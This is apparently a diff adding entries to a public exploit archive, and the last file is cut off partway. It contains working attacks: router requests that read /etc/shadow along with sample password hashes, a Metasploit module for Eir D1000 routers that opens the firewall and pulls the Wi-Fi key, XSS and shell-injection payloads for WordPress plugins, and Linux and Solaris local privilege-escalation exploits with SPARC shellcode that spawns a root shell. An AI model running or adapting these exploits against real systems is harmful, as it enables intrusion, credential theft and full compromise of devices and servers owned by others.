# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium ~]$ torsocks GET "http://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

39
platforms/hardware/remote/40736.txt Executable file
View file

@ -0,0 +1,39 @@
#!/bin/sh
#
# NETGEAR ADSL ROUTER JNR1010 1.0.0.16
# Authenticated Remote File Disclosure
#
# Hardware Version: JNR1010
# Firmware Version: 1.0.0.16
# GUI Language Version: 1.0.0.16
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:language=en_us&var:menu=advanced&var:page=basic_home
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

38
platforms/hardware/remote/40737.sh Executable file
View file

@ -0,0 +1,38 @@
#!/bin/sh
#
# NETGEAR ADSL ROUTER
# Authenticated Remote File Disclosure
#
# Hardware Version: WNR500 / WNR612v3 / JNR1010 / JNR2010
# Firmware Version: 1.0.7.2 / 1.0.0.9 / 1.0.0.32 / 1.0.0.20
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
http://USER:PASSWORD@TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

40
platforms/hardware/remote/40738.sh Executable file
View file

@ -0,0 +1,40 @@
#!/bin/sh
#
# PLANET ADSL ROUTER AND-4101 v1.8
# Remote File Disclosure
#
# Modem Name: ADN-4101
# HardwareVersion: ADN-4101
# SoftwareVersion: V1.8
# Firmware Version: V1.8
#
# Copyright 2016 (c) Todor Donev
# <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Thanks to Maya Hristova that support me.
[todor@adamantium]$ torsocks GET "https://TARGET:PORT/cgi-bin/webproc?getpage=/etc/shadow&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=wizard"
# #root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
# #tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::

237
platforms/linux/dos/40731.c Executable file
View file

File diff suppressed because one or more lines are too long

76
platforms/linux/local/40726.c Executable file
View file

@ -0,0 +1,76 @@
/*
* $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_chown.c - sys_chown missing DAC controls on Linux
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Unknown vulnerability in Linux kernel 2.x may allow local users to
* modify the group ID of files, such as NFS exported files in kernel
* 2.4 (CAN-2004-0497).
*
* "Basically, you can change the group of a file you don't own, but not
* of an SGID executable." -- Solar Designer (0dd)
*
* On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you
* don't own, even on local filesystems. This may allow a local attacker to
* perform a privilege escalation, e.g. through the following attack vectors:
*
* 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian
* 3.0, probably others) the shadow group has read access to it.
* 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.
* 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.
* 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.
*
* Usage:
* $ gcc raptor_chown.c -o raptor_chown -Wall
* $ ./raptor_chown /etc/shadow
* [...]
* -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow
*
* Vulnerable platforms:
* Linux 2.2.x (on nfs exported files, should be vuln) [untested]
* Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]
* Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]
*/
#include <errno.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#define INFO1 "raptor_chown.c - sys_chown missing DAC controls on Linux"
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
int main(int argc, char **argv)
{
char cmd[256];
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s file_name\n\n", argv[0]);
exit(1);
}
/* ninpou: sys_chown no jutsu! */
if (chown(argv[1], -1, getgid()) < 0) {
switch(errno) {
case EPERM:
fprintf(stderr, "Error: Not vulnerable!\n");
break;
default:
perror("Error");
}
exit(1);
}
fprintf(stderr, "Ninpou: sys_chown no jutsu!\n");
/* print some output */
sprintf(cmd, "/bin/ls -l %s", argv[1]);
system(cmd);
exit(0);
}

167
platforms/linux_mips/remote/40740.rb Executable file
View file

@ -0,0 +1,167 @@
# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
# Website: https://devicereversing.wordpress.com
# Tested on Firmware version: 2.00(AADU.5)_20150909
# Type: Webapps
# Platform: Hardware
Description
===========
By sending certain TR-064 commands, we can instruct the modem to open port 80 on the firewall. This allows access the the web administration interface from the Internet facing side of the modem. The default login password for the D1000 is the default Wi-Fi password. This is easily obtained with another TR-064 command.
Proof of Concept
================
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Eir D1000 Modem CWMP Exploit POC',
'Description' => %q{
This exploit drops the firewall to allow access to the web administration interface on port 80 and
it also retrieves the wifi password. The default login password to the web interface is the default wifi
password. This exploit was tested on firmware versions up to 2.00(AADU.5)_20150909.
},
'Author' =>
[
'Kenzo', # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Nov 07 2016',
'Privileged' => true,
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/mipsbe/shell_bind_tcp'
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
],
],
'DefaultTarget' => 1
))
register_options(
[
Opt::RPORT(7547), # CWMP port
], self.class)
@data_cmd_template = "<?xml version=\"1.0\"?>"
@data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
@data_cmd_template << " <SOAP-ENV:Body>"
@data_cmd_template << " <u:SetNTPServers xmlns:u=\"urn:dslforum-org:service:Time:1\">"
@data_cmd_template << " <NewNTPServer1>%s</NewNTPServer1>"
@data_cmd_template << " <NewNTPServer2></NewNTPServer2>"
@data_cmd_template << " <NewNTPServer3></NewNTPServer3>"
@data_cmd_template << " <NewNTPServer4></NewNTPServer4>"
@data_cmd_template << " <NewNTPServer5></NewNTPServer5>"
@data_cmd_template << " </u:SetNTPServers>"
@data_cmd_template << " </SOAP-ENV:Body>"
@data_cmd_template << "</SOAP-ENV:Envelope>"
end
def check
begin
res = send_request_cgi({
'uri' => '/globe'
})
rescue ::Rex::ConnectionError
vprint_error("A connection error has occured")
return Exploit::CheckCode::Unknown
end
if res and res.code == 404 and res.body =~ /home_wan.htm/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying to access the device...")
unless check == Exploit::CheckCode::Appears
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("Exploiting...")
print_status("Dropping firewall on port 80...")
execute_command("`iptables -I INPUT -p tcp --dport 80 -j ACCEPT`","")
key = get_wifi_key()
print_status("WiFi key is #{key}")
execute_command("tick.eircom.net","")
end
def execute_command(cmd, opts)
uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:Time:1#SetNTPServers"
data_cmd = @data_cmd_template % "#{cmd}"
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def get_wifi_key()
print_status("Getting the wifi key...")
uri = '/UD/act?1'
soapaction = "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
data_cmd_template = "<?xml version=\"1.0\"?>"
data_cmd_template << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
data_cmd_template << " <SOAP-ENV:Body>"
data_cmd_template << " <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
data_cmd_template << " </u:GetSecurityKeys>"
data_cmd_template << " </SOAP-ENV:Body>"
data_cmd_template << "</SOAP-ENV:Envelope>"
data_cmd= data_cmd_template
begin
res = send_request_cgi({
'uri' => uri,
'ctype' => "text/xml",
'method' => 'POST',
'headers' => {
'SOAPAction' => soapaction,
},
'data' => data_cmd
})
/NewPreSharedKey>(?<key>.*)<\/NewPreSharedKey/ =~ res.body
return key
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

44
platforms/php/webapps/40732.txt Executable file
View file

@ -0,0 +1,44 @@
Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_404_to_301_wordpress_plugin.html
Stored Cross-Site Scripting vulnerability in 404 to 301 WordPress Plugin
Abstract
A stored Cross-Site Scripting vulnerability was found in the 404 to 301 WordPress Plugin. This issue can be exploited by an anonymous user and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160719-0003
Tested versions
This issue was successfully tested on 404 to 301 WordPress Plugin version 2.2.8.
Fix
This issue is resolved in 404 to 301 WordPress Plugin version 2.3.1.
Introduction
The 404 to 301 WordPress Plugin automatically redirects, logs and notifies all 404 page errors to any page using 301 redirect for SEO. A Stored Cross-Site Scripting vulnerability exists in the 404-to-301 WordPress plugin.
Details
The vulnerability exists in the file admin/class-404-to-301-logs.php, which fails to correctly escape user-controlled strings which are output in HTML tables containing logs shown to site administrators, such as the Referer (ref) and User-Agent (ua) fields.
In order to exploit this issue, after an attack attempt has been made, an administrator must view the logs (via the WordPress administration console) provided by the plugin, by clicking '404 Error Logs'.
Proof of concept
Submit an HTTP request to a non-existent URL (to trigger the 404 handler) containing a header such as one of the following:
Referer: "<iframe src=/></iframe>
User-Agent: "<script>alert(/hi/);</script>

62
platforms/php/webapps/40733.txt Executable file
View file

@ -0,0 +1,62 @@
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wassup_real_time_analytics_wordpress_plugin.html
Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin
Abstract
A stored Cross-Site Scripting (XSS) vulnerability has been found in the WassUp Real Time Analytics WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.
Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl
The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
OVE ID
OVE-20160717-0002
Tested versions
This issue was successfully tested on WassUp Real Time Analytics version 1.9.
Fix
This issue has been fixed in version 1.9.1.
Introduction
The WassUp Real Time Analytics WordPress plugin can be used to analyze visitors' traffic with real-time statistics.
Details
A stored Cross-Site Scripting vulnerability was found in the Wassup WordPress plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed link.
The malicious script code can be sent by anyone visiting the website (unauthenticated). The malicious code is then executed in the admin panel under section 'Current Visitors' of the Wassup plugin page.
The issue exists in the file wassup.php and is caused by the lack of output encoding on the request-uri parameter. The vulnerable code is listed below.
</span><span class="request-uri"><?php echo wassupURI::url_link
and in the file wassup.class.php:
else $urllink='<a href="'.self::add_siteurl("$urlrequested").'" target="_BLANK">'.stringShortener("$urlrequested",$chars).'</a>';
return $urllink;
Proof of concept
1. Log in as admin and empty the log data of Wassup for a clean test -> http://<targetsite>/wp-admin/admin.php?page=wassup-options -> Manage Files and Data -> Empty table
2. Open Burp Suite and sent the following requests one after another:
GET /test HTTP/1.1
Host: <targetsite>
GET ///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(70,70,70))</SCRIPT> HTTP/1.1
Host: <targetsite>
3. Open the Current Visitors Online page as an admin: http://<targetsite>/wp-admin/admin.php?page=wassup-online
Note: Your request should be detected as a Spider/Bot by the Wassup plugin. One way to do this is by sending the requests above through Burp Suite.

47
platforms/php/webapps/40739.txt Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: XCloner <= 3.1.5 Multiple Vulnerabilities
# Google Dork: inurl:"plugins/xcloner-backup-and-restore/readme.txt" -site:wordpress.org
# Date: 08/11/2016
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: www.xcloner.com
# Software Link: https://es.wordpress.org/plugins/xcloner-backup-and-restore/
# Version: 3.1.5 and lower
# Tested on: Ubuntu 14 and PHP 5
# Product description: XCloner is a plugin for wordpress and Joomla! with more than 70.000 active installations to easily execute backup and restores on your CMS.
Authenticated DoS or CMS destruction
--------------------------------------------------------
Summary: XClonner does not check the file path is going to unlink
after unlinking it. Therefore, a deletion of random files on the file
system accesible by the web process is possible. A destruction of the
blog can be achieved with the following PoC:
1. Authenticate to wordpress with an administrator
2. Access to XCloner to the following URL:
* http://example.com/wp-admin/plugins.php?page=xcloner_show&option=xcloner&task=cron_delete&fconfig=../../../../wp-config.php
3. See how your wordpress stops working.
4. In case that the web server is running with higher privileges, a more destructive action would be possible deleting O.S. critical files.
Authenticated RCE
----------------------------
Summary:
XCloner does not filter the command line is being used to execute the
tar of a backup.
Random shell commands can be injected in this field.
A file creation in the file system can be achieved with the following PoC:
1. Authenticate to wordpress with an administrator
2. Access to Plugins -> XCloner
3. Navigate to Administration -> Configuration -> General
4. In "Server Use Options" set the field "Tar path or command" with
the following value:
* tar -h; cp /etc/passwd ./passwd.txt ; tar -k
5. Now go to "Actions -> Generate Backup"
6. Find the file passwd.txt in the wordpress root folder
7. Navigate to http://example.com/passwd.txt to see the file /etc/passwd
8. Looking at the code, the field to specify the mysqldump command
"Mysqldump path or command" is also injectable, but I have not a PoC
for it.
--
Felipe Molina de la Torre (@felmoltor)

33
platforms/solaris/local/40727.sh Executable file
View file

@ -0,0 +1,33 @@
#!/bin/sh
#
# $Id: raptor_ucbps,v 1.1 2006/07/26 12:15:42 raptor Exp $
#
# raptor_ucbps - information leak with Solaris /usr/ucb/ps
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# A security vulnerability in the "/usr/ucb/ps" (see ps(1B)) command may allow
# unprivileged local users the ability to see environment variables and their
# values for processes which belong to other users (Sun Alert ID: 102215).
#
# Absolutely nothing fancy, but it may turn out to be useful;)
#
# Usage:
# $ chmod +x raptor_ucbps
# $ ./raptor_ucbps
# [...]
#
# Vulnerable platforms (SPARC):
# Solaris 8 without patch 109023-05 [tested]
# Solaris 9 without patch 120240-01 [tested]
#
# Vulnerable platforms (x86):
# Solaris 8 without patch 109024-05 [untested]
# Solaris 9 without patch 120239-01 [untested]
#
echo "raptor_ucbps - information leak with Solaris /usr/ucb/ps"
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
/usr/ucb/ps -auxgeww

189
platforms/solaris/local/40728.c Executable file
View file

@ -0,0 +1,189 @@
/*
* $Id: raptor_libdthelp.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_libdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Buffer overflow in CDE libDtHelp library allows local users to execute
* arbitrary code via a modified DTHELPUSERSEARCHPATH environment variable
* and the Help feature (CAN-2003-0834).
*
* Possible attack vectors are: DTHELPSEARCHPATH (as used in this exploit),
* DTHELPUSERSEARCHPATH, LOGNAME (those two require a slightly different
* exploitation technique, due to different code paths).
*
* Usage:
* $ gcc raptor_libdthelp.c -o raptor_libdthelp -Wall
* [on your xserver: disable the access control]
* $ ./raptor_libdthelp 192.168.1.1:0
* [on your xserver: enter the dtprintinfo help]
* # id
* uid=0(root) gid=1(other)
* #
*
* Vulnerable platforms:
* Solaris 7 without patch 107178-03 [tested]
* Solaris 8 without patch 108949-08 [tested]
* Solaris 9 without patch 116308-01 [tested]
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_libdthelp.c - libDtHelp.so local, Solaris/SPARC 7/8/9"
#define INFO2 "Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // default setuid target
#define BUFSIZE 1200 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env vars
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
/* double setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE];
char platform[256], release[256], display[256];
int i, offset, ret, var1_addr, var2_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "DTHELPSEARCHPATH=", 17);
/* prepare the evil env vars */
memset(var1, 'B', sizeof(var1));
var1[sizeof(var1) - 1] = 0x0;
memset(var2, 'C', sizeof(var2));
var2[sizeof(var2) - 1] = 0x0;
/* fill the envp, keeping padding */
var1_addr = add_env(sc);
var2_addr = add_env(var1);
add_env(var2);
add_env(display);
add_env("PATH=/usr/bin:/bin:/usr/sbin:/sbin");
add_env("HOME=/tmp");
add_env(buf);
add_env(NULL);
/* calculate the offset to argv[0] (voodoo magic) */
plat_len = strlen(platform) + 1;
prog_len = strlen(VULN) + 1;
offset = arg_len + env_len + plat_len + prog_len;
if (rel > 7)
VOODOO64(offset, arg_pos, env_pos)
else
VOODOO32(offset, plat_len, prog_len)
/* calculate the needed addresses */
ret = sb - offset + arg_len;
var1_addr += ret;
var2_addr += ret;
/* fill the evil buffer */
for (i = 17; i < BUFSIZE - 8; i += 4)
set_val(buf, i, var1_addr - 5000);
/* fill the evil env vars */
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var1, i, var2_addr - 500);
for (i = 0; i < VARSIZE - 8; i += 4)
set_val(var2, i, ret);
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using var1 address\t: 0x%p\n", (void *)var1_addr);
fprintf(stderr, "Using var2 address\t: 0x%p\n", (void *)var2_addr);
fprintf(stderr, "Using ret address\t: 0x%p\n\n", (void *)ret);
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return(env_len);
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return(env_len);
}
/*
* set_val(): copy a dword inside a buffer
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0xff000000) >> 24;
buf[pos + 1] = (val & 0x00ff0000) >> 16;
buf[pos + 2] = (val & 0x0000ff00) >> 8;
buf[pos + 3] = (val & 0x000000ff);
}

329
platforms/solaris/local/40729.c Executable file
View file

@ -0,0 +1,329 @@
/*
* $Id: raptor_libdthelp2.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
*
* raptor_libdthelp2.c - libDtHelp.so local, Solaris/SPARC 7/8/9
* Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* Buffer overflow in CDE libDtHelp library allows local users to execute
* arbitrary code via a modified DTHELPUSERSEARCHPATH environment variable
* and the Help feature (CAN-2003-0834).
*
* "Stay with non exec, it keeps you honest" -- Dave Aitel (0dd)
*
* Possible attack vectors are: DTHELPSEARCHPATH (as used in this exploit),
* DTHELPUSERSEARCHPATH, LOGNAME (those two require a slightly different
* exploitation technique, due to different code paths).
*
* This is the ret-into-ld.so version of raptor_libdthelp.c, able to bypass
* the non-executable stack protection (noexec_user_stack=1 in /etc/system).
*
* NOTE. If experiencing troubles with null-bytes inside the ld.so.1 memory
* space, use sprintf() instead of strcpy() (tested on some Solaris 7 boxes).
*
* Usage:
* $ gcc raptor_libdthelp2.c -o raptor_libdthelp2 -ldl -Wall
* [on your xserver: disable the access control]
* $ ./raptor_libdthelp2 192.168.1.1:0
* [on your xserver: enter the dtprintinfo help]
* # id
* uid=0(root) gid=1(other)
* #
*
* Vulnerable platforms:
* Solaris 7 without patch 107178-03 [tested]
* Solaris 8 without patch 108949-08 [tested]
* Solaris 9 without patch 116308-01 [tested]
*/
#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>
#define INFO1 "raptor_libdthelp2.c - libDtHelp.so local, Solaris/SPARC 7/8/9"
#define INFO2 "Copyright (c) 2003-2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // default setuid target
#define BUFSIZE 1200 // size of the evil buffer
#define VARSIZE 1024 // size of the evil env vars
#define FFSIZE 64 + 1 // size of the fake frame
#define DUMMY 0xdeadbeef // dummy memory address
/* voodoo macros */
#define VOODOO32(_,__,___) {_--;_+=(__+___-1)%4-_%4<0?8-_%4:4-_%4;}
#define VOODOO64(_,__,___) {_+=7-(_+(__+___+1)*4+3)%8;}
char sc[] = /* Solaris/SPARC shellcode (12 + 12 + 48 = 72 bytes) */
/* double setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], var1[VARSIZE], var2[VARSIZE], ff[FFSIZE];
char platform[256], release[256], display[256];
int i, offset, ff_addr, sc_addr, var1_addr, var2_addr;
int plat_len, prog_len, rel;
char *arg[2] = {"foo", NULL};
int arg_len = 4, arg_pos = 1;
int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem();
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* get some system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
rel = atoi(release + 2);
/* prepare the evil buffer */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "DTHELPSEARCHPATH=", 17);
/* prepare the evil env vars */
memset(var1, 'B', sizeof(var1));
var1[sizeof(var1) - 1] = 0x0;
memset(var2, 'C', sizeof(var2));
var2[sizeof(var2) - 1] = 0x0;
/* prepare the fake frame */
bzero(ff, sizeof(ff));
/*
* saved %l registers
*/
set_val(ff, i = 0, DUMMY); /* %l0 */
set_val(ff, i += 4, DUMMY); /* %l1 */
set_val(ff, i += 4, DUMMY); /* %l2 */
set_val(ff, i += 4, DUMMY); /* %l3 */
set_val(ff, i += 4, DUMMY); /* %l4 */
set_val(ff, i += 4, DUMMY); /* %l5 */
set_val(ff, i += 4, DUMMY); /* %l6 */
set_val(ff, i += 4, DUMMY); /* %l7 */
/*
* saved %i registers
*/
set_val(ff, i += 4, rwx_mem); /* %i0: 1st arg to strcpy() */
